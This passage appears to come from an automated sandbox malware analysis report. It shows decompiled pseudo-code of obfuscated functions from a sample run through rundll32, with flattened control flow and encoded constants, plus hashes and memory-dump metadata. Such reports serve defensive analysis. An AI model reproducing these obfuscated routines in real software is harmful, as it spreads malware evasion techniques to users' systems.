                                                                                                                          									_t127 =  &(_t127[2]);
                                                                                                                          									_t125 = 0xa7224d4;
                                                                                                                          									_t124 = _t124 + _t115;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L11:
                                                                                                                          						return _t124;
                                                                                                                          					}
                                                                                                                          					_t125 = 0xcb4deb0;
                                                                                                                          					L8:
                                                                                                                          				} while (_t125 != 0x4501b46);
                                                                                                                          				goto L11;
                                                                                                                          			}






















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 9^xu$fj$im
                                                                                                                          • API String ID: 0-3261451082
                                                                                                                          • Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                          • Instruction ID: dba0febb2ce73170a93a27d43b4a50801f7a6e52067c051ce4ea2ee7bd47d8d0
                                                                                                                          • Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                          • Instruction Fuzzy Hash: 835156B25083429BC784CF25D48944BBBE0BFD8368F501A1DF495A6260D3B4CA59CF87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E007A6C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				intOrPtr _v56;
                                                                                                                          				char _v88;
                                                                                                                          				char _v608;
                                                                                                                          				void* _t92;
                                                                                                                          				void* _t96;
                                                                                                                          				void* _t101;
                                                                                                                          				void* _t112;
                                                                                                                          				void* _t113;
                                                                                                                          
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t92);
                                                                                                                          				_v52 = _v52 & 0x00000000;
                                                                                                                          				_v56 = 0x878462;
                                                                                                                          				_t113 = _t112 + 0x14;
                                                                                                                          				_v32 = 0x956791;
                                                                                                                          				_t101 = 0x1300659;
                                                                                                                          				_v32 = _v32 + 0xffff68af;
                                                                                                                          				_v32 = _v32 ^ 0x0094d050;
                                                                                                                          				_v48 = 0xb6c679;
                                                                                                                          				_v48 = _v48 * 9;
                                                                                                                          				_v48 = _v48 ^ 0x0662f925;
                                                                                                                          				_v16 = 0xd9c762;
                                                                                                                          				_v16 = _v16 << 1;
                                                                                                                          				_v16 = _v16 | 0xb4c78449;
                                                                                                                          				_v16 = _v16 ^ 0xb5f30401;
                                                                                                                          				_v40 = 0x8b331e;
                                                                                                                          				_v40 = _v40 >> 0xc;
                                                                                                                          				_v40 = _v40 ^ 0x000c5129;
                                                                                                                          				_v28 = 0x1269f4;
                                                                                                                          				_v28 = _v28 >> 4;
                                                                                                                          				_v28 = _v28 ^ 0x0007e996;
                                                                                                                          				_v44 = 0xabd705;
                                                                                                                          				_v44 = _v44 ^ 0x9c90d177;
                                                                                                                          				_v44 = _v44 ^ 0x9c3fe788;
                                                                                                                          				_v8 = 0x357d72;
                                                                                                                          				_v8 = _v8 + 0xd90c;
                                                                                                                          				_v8 = _v8 ^ 0xccfdbdcb;
                                                                                                                          				_v8 = _v8 >> 3;
                                                                                                                          				_v8 = _v8 ^ 0x199e890f;
                                                                                                                          				_v12 = 0x32e6;
                                                                                                                          				_v12 = _v12 ^ 0x74a35607;
                                                                                                                          				_v12 = _v12 | 0x704b9008;
                                                                                                                          				_v12 = _v12 + 0xffff83aa;
                                                                                                                          				_v12 = _v12 ^ 0x74eee325;
                                                                                                                          				_v36 = 0xeddfb6;
                                                                                                                          				_v36 = _v36 << 0xa;
                                                                                                                          				_v36 = _v36 ^ 0xb77b8cf2;
                                                                                                                          				_v24 = 0xe2b758;
                                                                                                                          				_v24 = _v24 << 5;
                                                                                                                          				_v24 = _v24 * 0x38;
                                                                                                                          				_v24 = _v24 ^ 0x330719f5;
                                                                                                                          				_v20 = 0x9236d6;
                                                                                                                          				_v20 = _v20 | 0x3f0523f5;
                                                                                                                          				_v20 = _v20 >> 0xd;
                                                                                                                          				_v20 = _v20 ^ 0x000835ca;
                                                                                                                          				do {
                                                                                                                          					while(_t101 != 0x1300659) {
                                                                                                                          						if(_t101 == 0xa264c44) {
                                                                                                                          							_t96 = E00799D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
                                                                                                                          							_t113 = _t113 + 0x10;
                                                                                                                          							_t101 = 0xbcabc0e;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t101 != 0xbcabc0e) {
                                                                                                                          							goto L8;
                                                                                                                          						}
                                                                                                                          						return E007A6637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
                                                                                                                          					}
                                                                                                                          					_t96 = E00794B61( &_v88, _v32, _v48, _v16);
                                                                                                                          					_t101 = 0xa264c44;
                                                                                                                          					L8:
                                                                                                                          				} while (_t101 != 0x478adce);
                                                                                                                          				return _t96;
                                                                                                                          			}
























                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %t$DL&$r}5
                                                                                                                          • API String ID: 0-2337153543
                                                                                                                          • Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                          • Instruction ID: d3fe29aca99ae7adbcb365e3017bbf12104409cbb69dae960de1d7f86a1abc0a
                                                                                                                          • Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                          • Instruction Fuzzy Hash: E8412371D0020EEBCF09DFE5D94A4EEBBB1FB48318F248198D51176260D3B94A59CFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                            • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                            • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1958600898-0
                                                                                                                          • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                          • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                          • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                          • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E007A1889(void* __ecx) {
                                                                                                                          				char _v520;
                                                                                                                          				char _v1040;
                                                                                                                          				char _v1560;
                                                                                                                          				short _v1564;
                                                                                                                          				intOrPtr _v1568;
                                                                                                                          				signed int _v1572;
                                                                                                                          				signed int _v1576;
                                                                                                                          				signed int _v1580;
                                                                                                                          				signed int _v1584;
                                                                                                                          				signed int _v1588;
                                                                                                                          				signed int _v1592;
                                                                                                                          				signed int _v1596;
                                                                                                                          				signed int _v1600;
                                                                                                                          				signed int _v1604;
                                                                                                                          				signed int _v1608;
                                                                                                                          				signed int _v1612;
                                                                                                                          				signed int _v1616;
                                                                                                                          				signed int _v1620;
                                                                                                                          				signed int _v1624;
                                                                                                                          				signed int _v1628;
                                                                                                                          				signed int _v1632;
                                                                                                                          				signed int _v1636;
                                                                                                                          				signed int _v1640;
                                                                                                                          				signed int _v1644;
                                                                                                                          				signed int _v1648;
                                                                                                                          				signed int _v1652;
                                                                                                                          				signed int _v1656;
                                                                                                                          				signed int _v1660;
                                                                                                                          				signed int _v1664;
                                                                                                                          				signed int _v1668;
                                                                                                                          				signed int _v1672;
                                                                                                                          				signed int _v1676;
                                                                                                                          				signed int _v1680;
                                                                                                                          				signed int _t323;
                                                                                                                          				signed int _t334;
                                                                                                                          				signed int _t337;
                                                                                                                          				signed int _t338;
                                                                                                                          				signed int _t339;
                                                                                                                          				signed int _t340;
                                                                                                                          				signed int _t341;
                                                                                                                          				signed int _t342;
                                                                                                                          				signed int _t343;
                                                                                                                          				signed int _t344;
                                                                                                                          				signed int _t345;
                                                                                                                          				signed int _t346;
                                                                                                                          				void* _t386;
                                                                                                                          				void* _t387;
                                                                                                                          				signed int* _t390;
                                                                                                                          
                                                                                                                          				_t390 =  &_v1680;
                                                                                                                          				_v1568 = 0xdfec4c;
                                                                                                                          				_t386 = __ecx;
                                                                                                                          				_v1564 = 0;
                                                                                                                          				_t387 = 0xea1969c;
                                                                                                                          				_v1596 = 0xb94d4f;
                                                                                                                          				_v1596 = _v1596 >> 2;
                                                                                                                          				_v1596 = _v1596 ^ 0x002b88ba;
                                                                                                                          				_v1604 = 0x7820e8;
                                                                                                                          				_t9 =  &_v1604; // 0x7820e8
                                                                                                                          				_t337 = 0x3f;
                                                                                                                          				_v1604 =  *_t9 / _t337;
                                                                                                                          				_v1604 = _v1604 << 6;
                                                                                                                          				_v1604 = _v1604 ^ 0x0075b154;
                                                                                                                          				_v1676 = 0xd796f6;
                                                                                                                          				_v1676 = _v1676 << 7;
                                                                                                                          				_t338 = 0x1f;
                                                                                                                          				_v1676 = _v1676 / _t338;
                                                                                                                          				_v1676 = _v1676 | 0x34dfec15;
                                                                                                                          				_v1676 = _v1676 ^ 0x37fcd475;
                                                                                                                          				_v1580 = 0x701ced;
                                                                                                                          				_t339 = 0x3b;
                                                                                                                          				_v1580 = _v1580 / _t339;
                                                                                                                          				_v1580 = _v1580 ^ 0x000eda5b;
                                                                                                                          				_v1584 = 0x3864f;
                                                                                                                          				_v1584 = _v1584 | 0xebab6106;
                                                                                                                          				_v1584 = _v1584 ^ 0xeba3c8dc;
                                                                                                                          				_v1668 = 0x7d6229;
                                                                                                                          				_v1668 = _v1668 + 0x90f9;
                                                                                                                          				_t340 = 0x7d;
                                                                                                                          				_v1668 = _v1668 * 0xd;
                                                                                                                          				_v1668 = _v1668 + 0x17d6;
                                                                                                                          				_v1668 = _v1668 ^ 0x06671cb6;
                                                                                                                          				_v1652 = 0x8dafad;
                                                                                                                          				_v1652 = _v1652 + 0xffffa237;
                                                                                                                          				_v1652 = _v1652 / _t340;
                                                                                                                          				_v1652 = _v1652 ^ 0xeab94c45;
                                                                                                                          				_v1652 = _v1652 ^ 0xeabb4144;
                                                                                                                          				_v1620 = 0x364acf;
                                                                                                                          				_v1620 = _v1620 + 0xffffd559;
                                                                                                                          				_v1620 = _v1620 ^ 0x476b0832;
                                                                                                                          				_v1620 = _v1620 ^ 0x4757dcec;
                                                                                                                          				_v1660 = 0xdffac8;
                                                                                                                          				_v1660 = _v1660 | 0xd3f81aab;
                                                                                                                          				_t341 = 0xd;
                                                                                                                          				_v1660 = _v1660 / _t341;
                                                                                                                          				_v1660 = _v1660 + 0x2ca8;
                                                                                                                          				_v1660 = _v1660 ^ 0x10473906;
                                                                                                                          				_v1636 = 0xafa95;
                                                                                                                          				_v1636 = _v1636 | 0x12b9adda;
                                                                                                                          				_v1636 = _v1636 + 0xca30;
                                                                                                                          				_t342 = 0x24;
                                                                                                                          				_v1636 = _v1636 / _t342;
                                                                                                                          				_v1636 = _v1636 ^ 0x008bc8e6;
                                                                                                                          				_v1612 = 0xa1b06d;
                                                                                                                          				_v1612 = _v1612 ^ 0xd927b519;
                                                                                                                          				_t334 = 0x1c;
                                                                                                                          				_v1612 = _v1612 / _t334;
                                                                                                                          				_v1612 = _v1612 ^ 0x07c55aff;
                                                                                                                          				_v1628 = 0xe475d7;
                                                                                                                          				_v1628 = _v1628 + 0xf351;
                                                                                                                          				_v1628 = _v1628 >> 9;
                                                                                                                          				_v1628 = _v1628 ^ 0x000b149a;
                                                                                                                          				_v1644 = 0xc98f78;
                                                                                                                          				_v1644 = _v1644 + 0xa497;
                                                                                                                          				_v1644 = _v1644 + 0xab0a;
                                                                                                                          				_v1644 = _v1644 ^ 0x9916dffd;
                                                                                                                          				_v1644 = _v1644 ^ 0x99d32d23;
                                                                                                                          				_v1572 = 0xdb2c8b;
                                                                                                                          				_v1572 = _v1572 ^ 0xa2354bd4;
                                                                                                                          				_v1572 = _v1572 ^ 0xa2e9b3f6;
                                                                                                                          				_v1616 = 0x8ac290;
                                                                                                                          				_v1616 = _v1616 | 0xd6340cba;
                                                                                                                          				_t343 = 0x17;
                                                                                                                          				_v1616 = _v1616 / _t343;
                                                                                                                          				_v1616 = _v1616 ^ 0x095403ec;
                                                                                                                          				_v1624 = 0xc9b33;
                                                                                                                          				_v1624 = _v1624 | 0xadec2c36;
                                                                                                                          				_t344 = 0x23;
                                                                                                                          				_v1624 = _v1624 / _t344;
                                                                                                                          				_v1624 = _v1624 ^ 0x04f29945;
                                                                                                                          				_v1672 = 0xce6284;
                                                                                                                          				_t345 = 0x1b;
                                                                                                                          				_v1672 = _v1672 * 0x47;
                                                                                                                          				_v1672 = _v1672 >> 0xb;
                                                                                                                          				_v1672 = _v1672 | 0xab5418c0;
                                                                                                                          				_v1672 = _v1672 ^ 0xab589207;
                                                                                                                          				_v1680 = 0xfb4294;
                                                                                                                          				_v1680 = _v1680 * 0x56;
                                                                                                                          				_v1680 = _v1680 >> 0xe;
                                                                                                                          				_v1680 = _v1680 >> 4;
                                                                                                                          				_v1680 = _v1680 ^ 0x000a896c;
                                                                                                                          				_v1576 = 0xa0fe48;
                                                                                                                          				_v1576 = _v1576 / _t345;
                                                                                                                          				_v1576 = _v1576 ^ 0x000b8e8e;
                                                                                                                          				_v1608 = 0x915f33;
                                                                                                                          				_v1608 = _v1608 + 0xfa43;
                                                                                                                          				_v1608 = _v1608 >> 0xc;
                                                                                                                          				_v1608 = _v1608 ^ 0x000a30cc;
                                                                                                                          				_v1648 = 0x21b71b;
                                                                                                                          				_v1648 = _v1648 ^ 0x78ef874e;
                                                                                                                          				_v1648 = _v1648 | 0x9c246086;
                                                                                                                          				_v1648 = _v1648 * 0x4a;
                                                                                                                          				_v1648 = _v1648 ^ 0x1ce73be6;
                                                                                                                          				_v1592 = 0x926794;
                                                                                                                          				_v1592 = _v1592 + 0xffff6f6e;
                                                                                                                          				_v1592 = _v1592 ^ 0x009c0ed2;
                                                                                                                          				_v1656 = 0x919083;
                                                                                                                          				_v1656 = _v1656 / _t334;
                                                                                                                          				_v1656 = _v1656 >> 2;
                                                                                                                          				_t346 = 0x67;
                                                                                                                          				_v1656 = _v1656 / _t346;
                                                                                                                          				_v1656 = _v1656 ^ 0x0003c4fa;
                                                                                                                          				_v1664 = 0xb12839;
                                                                                                                          				_v1664 = _v1664 ^ 0xbcb8295e;
                                                                                                                          				_v1664 = _v1664 + 0xe70b;
                                                                                                                          				_v1664 = _v1664 + 0xffffbcc9;
                                                                                                                          				_v1664 = _v1664 ^ 0xbc0a928f;
                                                                                                                          				_v1600 = 0x37ff42;
                                                                                                                          				_v1600 = _v1600 + 0xffff03fd;
                                                                                                                          				_v1600 = _v1600 >> 3;
                                                                                                                          				_v1600 = _v1600 ^ 0x000f4750;
                                                                                                                          				_v1632 = 0xbb4856;
                                                                                                                          				_v1632 = _v1632 * 0x4e;
                                                                                                                          				_v1632 = _v1632 | 0xf74fdfff;
                                                                                                                          				_v1632 = _v1632 ^ 0xff54b7ec;
                                                                                                                          				_v1640 = 0x73c8d7;
                                                                                                                          				_v1640 = _v1640 * 0x56;
                                                                                                                          				_v1640 = _v1640 << 0xb;
                                                                                                                          				_v1640 = _v1640 >> 7;
                                                                                                                          				_v1640 = _v1640 ^ 0x005dc3ee;
                                                                                                                          				_v1588 = 0xe2f656;
                                                                                                                          				_t323 = _v1588 * 0x57;
                                                                                                                          				_v1588 = _t323;
                                                                                                                          				_v1588 = _v1588 ^ 0x4d200bca;
                                                                                                                          				while(_t387 != 0x5de06da) {
                                                                                                                          					if(_t387 == 0xea1969c) {
                                                                                                                          						_t387 = 0xfa9128f;
                                                                                                                          						continue;
                                                                                                                          					} else {
                                                                                                                          						_t395 = _t387 - 0xfa9128f;
                                                                                                                          						if(_t387 != 0xfa9128f) {
                                                                                                                          							L8:
                                                                                                                          							__eflags = _t387 - 0xa8e801c;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							E007ADA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
                                                                                                                          							 *((short*)(E0079B6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
                                                                                                                          							E00798969(_v1620,  &_v520, _t395, _v1660, _v1636);
                                                                                                                          							_push(_v1644);
                                                                                                                          							_push(_v1628);
                                                                                                                          							E007947CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E007ADCF7(_v1612, 0x791328, _t395),  &_v520, _v1672, _v1680);
                                                                                                                          							E0079A8B0(_v1576, _t329, _v1608);
                                                                                                                          							_t346 = _v1648;
                                                                                                                          							_t323 = E0079EA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
                                                                                                                          							_t390 =  &(_t390[0x17]);
                                                                                                                          							if(_t323 != 0) {
                                                                                                                          								_t387 = 0x5de06da;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return _t323;
                                                                                                                          				}
                                                                                                                          				_push(_v1588);
                                                                                                                          				_push( &_v1560);
                                                                                                                          				_push(_t346);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(_v1640);
                                                                                                                          				_t346 = _v1600;
                                                                                                                          				_push(0);
                                                                                                                          				_t323 = E0079AB87(_t346, _v1632, __eflags);
                                                                                                                          				_t390 =  &(_t390[7]);
                                                                                                                          				_t387 = 0xa8e801c;
                                                                                                                          				goto L8;
                                                                                                                          			}
                                                                                                                          0x007a1a7b
                                                                                                                          0x007a1a83
                                                                                                                          0x007a1a8b
                                                                                                                          0x007a1a93
                                                                                                                          0x007a1a9b
                                                                                                                          0x007a1aa3
                                                                                                                          0x007a1aab
                                                                                                                          0x007a1ab9
                                                                                                                          0x007a1abe
                                                                                                                          0x007a1ac2
                                                                                                                          0x007a1aca
                                                                                                                          0x007a1ad2
                                                                                                                          0x007a1ae0
                                                                                                                          0x007a1ae5
                                                                                                                          0x007a1ae9
                                                                                                                          0x007a1af1
                                                                                                                          0x007a1b00
                                                                                                                          0x007a1b01
                                                                                                                          0x007a1b05
                                                                                                                          0x007a1b0a
                                                                                                                          0x007a1b12
                                                                                                                          0x007a1b1a
                                                                                                                          0x007a1b27
                                                                                                                          0x007a1b2b
                                                                                                                          0x007a1b30
                                                                                                                          0x007a1b35
                                                                                                                          0x007a1b3d
                                                                                                                          0x007a1b4d
                                                                                                                          0x007a1b51
                                                                                                                          0x007a1b59
                                                                                                                          0x007a1b61
                                                                                                                          0x007a1b69
                                                                                                                          0x007a1b6e
                                                                                                                          0x007a1b76
                                                                                                                          0x007a1b7e
                                                                                                                          0x007a1b86
                                                                                                                          0x007a1b93
                                                                                                                          0x007a1b97
                                                                                                                          0x007a1b9f
                                                                                                                          0x007a1ba7
                                                                                                                          0x007a1baf
                                                                                                                          0x007a1bb7
                                                                                                                          0x007a1bc5
                                                                                                                          0x007a1bc9
                                                                                                                          0x007a1bd6
                                                                                                                          0x007a1bde
                                                                                                                          0x007a1be2
                                                                                                                          0x007a1bea
                                                                                                                          0x007a1bf2
                                                                                                                          0x007a1bfa
                                                                                                                          0x007a1c02
                                                                                                                          0x007a1c0a
                                                                                                                          0x007a1c12
                                                                                                                          0x007a1c1a
                                                                                                                          0x007a1c22
                                                                                                                          0x007a1c27
                                                                                                                          0x007a1c2f
                                                                                                                          0x007a1c3c
                                                                                                                          0x007a1c40
                                                                                                                          0x007a1c48
                                                                                                                          0x007a1c50
                                                                                                                          0x007a1c5d
                                                                                                                          0x007a1c61
                                                                                                                          0x007a1c66
                                                                                                                          0x007a1c6b
                                                                                                                          0x007a1c73
                                                                                                                          0x007a1c7b
                                                                                                                          0x007a1c80
                                                                                                                          0x007a1c84
                                                                                                                          0x007a1c8c
                                                                                                                          0x007a1c9a
                                                                                                                          0x007a1d93
                                                                                                                          0x00000000
                                                                                                                          0x007a1ca0
                                                                                                                          0x007a1ca0
                                                                                                                          0x007a1ca6
                                                                                                                          0x007a1dc6
                                                                                                                          0x007a1dc6
                                                                                                                          0x007a1dcc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a1cac
                                                                                                                          0x007a1cc5
                                                                                                                          0x007a1cf6
                                                                                                                          0x007a1cfd
                                                                                                                          0x007a1d02
                                                                                                                          0x007a1d0b
                                                                                                                          0x007a1d4c
                                                                                                                          0x007a1d5e
                                                                                                                          0x007a1d7c
                                                                                                                          0x007a1d80
                                                                                                                          0x007a1d85
                                                                                                                          0x007a1d8a
                                                                                                                          0x007a1d8c
                                                                                                                          0x00000000
                                                                                                                          0x007a1d8c
                                                                                                                          0x007a1d8a
                                                                                                                          0x007a1ca6
                                                                                                                          0x007a1ddc
                                                                                                                          0x007a1ddc
                                                                                                                          0x007a1d9d
                                                                                                                          0x007a1da8
                                                                                                                          0x007a1da9
                                                                                                                          0x007a1daa
                                                                                                                          0x007a1dab
                                                                                                                          0x007a1dac
                                                                                                                          0x007a1db4
                                                                                                                          0x007a1db8
                                                                                                                          0x007a1db9
                                                                                                                          0x007a1dbe
                                                                                                                          0x007a1dc1
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: )b}$ x
                                                                                                                          • API String ID: 0-2724122486
                                                                                                                          • Opcode ID: b8cf03b1058855b61e12cf92aff27bfc11a27e8cd622279fc57111541d8365a4
                                                                                                                          • Instruction ID: 573749bd95757707c50caa6128a197bd72d7da7b824a0e8b030681fc7edafc92
                                                                                                                          • Opcode Fuzzy Hash: b8cf03b1058855b61e12cf92aff27bfc11a27e8cd622279fc57111541d8365a4
                                                                                                                          • Instruction Fuzzy Hash: 6FD1217250C3819FE368CF60C48A95BFBE2FBC5358F108A1DF29996260D7B58949CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 99%
                                                                                                                          			E007A473C() {
                                                                                                                          				intOrPtr _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				void* _t218;
                                                                                                                          				signed int _t219;
                                                                                                                          				void* _t225;
                                                                                                                          				void* _t246;
                                                                                                                          				intOrPtr _t251;
                                                                                                                          				signed int _t252;
                                                                                                                          				signed int _t253;
                                                                                                                          				signed int _t254;
                                                                                                                          				signed int _t255;
                                                                                                                          				signed int _t256;
                                                                                                                          				signed int _t257;
                                                                                                                          				intOrPtr _t258;
                                                                                                                          				intOrPtr* _t259;
                                                                                                                          				signed int _t260;
                                                                                                                          				signed int* _t261;
                                                                                                                          
                                                                                                                          				_t261 =  &_v100;
                                                                                                                          				_v12 = 0xf244e3;
                                                                                                                          				_v8 = 0x291d6d;
                                                                                                                          				_t225 = 0x37f2dd7;
                                                                                                                          				_t251 = 0;
                                                                                                                          				_v4 = 0;
                                                                                                                          				_v68 = 0x555e8d;
                                                                                                                          				_v68 = _v68 + 0xfffff532;
                                                                                                                          				_v68 = _v68 | 0x235b50f0;
                                                                                                                          				_v68 = _v68 ^ 0x235e53ff;
                                                                                                                          				_v84 = 0xf72ec;
                                                                                                                          				_v84 = _v84 >> 7;
                                                                                                                          				_t252 = 0x19;
                                                                                                                          				_v84 = _v84 / _t252;
                                                                                                                          				_v84 = _v84 << 3;
                                                                                                                          				_v84 = _v84 ^ 0x000f09df;
                                                                                                                          				_v20 = 0xee8389;
                                                                                                                          				_t253 = 0x51;
                                                                                                                          				_v20 = _v20 * 0x29;
                                                                                                                          				_v20 = _v20 ^ 0x2635dc09;
                                                                                                                          				_v88 = 0xea545e;
                                                                                                                          				_t30 =  &_v88; // 0xea545e
                                                                                                                          				_v88 =  *_t30 / _t253;
                                                                                                                          				_t36 =  &_v88; // 0xea545e
                                                                                                                          				_t254 = 0x7a;
                                                                                                                          				_v88 =  *_t36 * 0x1c;
                                                                                                                          				_v88 = _v88 + 0xc9a8;
                                                                                                                          				_v88 = _v88 ^ 0x005db592;
                                                                                                                          				_v24 = 0x448750;
                                                                                                                          				_v24 = _v24 / _t254;
                                                                                                                          				_v24 = _v24 ^ 0x000cab3c;
                                                                                                                          				_v28 = 0x8cea36;
                                                                                                                          				_v28 = _v28 * 0x38;
                                                                                                                          				_v28 = _v28 ^ 0x1eda9ad9;
                                                                                                                          				_v100 = 0x8110ba;
                                                                                                                          				_v100 = _v100 + 0x3ab9;
                                                                                                                          				_v100 = _v100 ^ 0x336ca884;
                                                                                                                          				_v100 = _v100 + 0xffff8c66;
                                                                                                                          				_v100 = _v100 ^ 0x33e0711c;
                                                                                                                          				_v64 = 0x5ca85e;
                                                                                                                          				_v64 = _v64 >> 0x10;
                                                                                                                          				_v64 = _v64 * 0x4e;
                                                                                                                          				_v64 = _v64 ^ 0x000b11ab;
                                                                                                                          				_v44 = 0x2bb2b6;
                                                                                                                          				_v44 = _v44 | 0xbbfbcd5f;
                                                                                                                          				_v44 = _v44 ^ 0xbbf16182;
                                                                                                                          				_v72 = 0x855f4c;
                                                                                                                          				_v72 = _v72 ^ 0x87656771;
                                                                                                                          				_v72 = _v72 * 0x71;
                                                                                                                          				_v72 = _v72 ^ 0xf9f8e59a;
                                                                                                                          				_v96 = 0x938339;
                                                                                                                          				_v96 = _v96 << 8;
                                                                                                                          				_v96 = _v96 << 0xf;
                                                                                                                          				_v96 = _v96 ^ 0xcc040e17;
                                                                                                                          				_v96 = _v96 ^ 0x50841052;
                                                                                                                          				_v40 = 0xbe1d32;
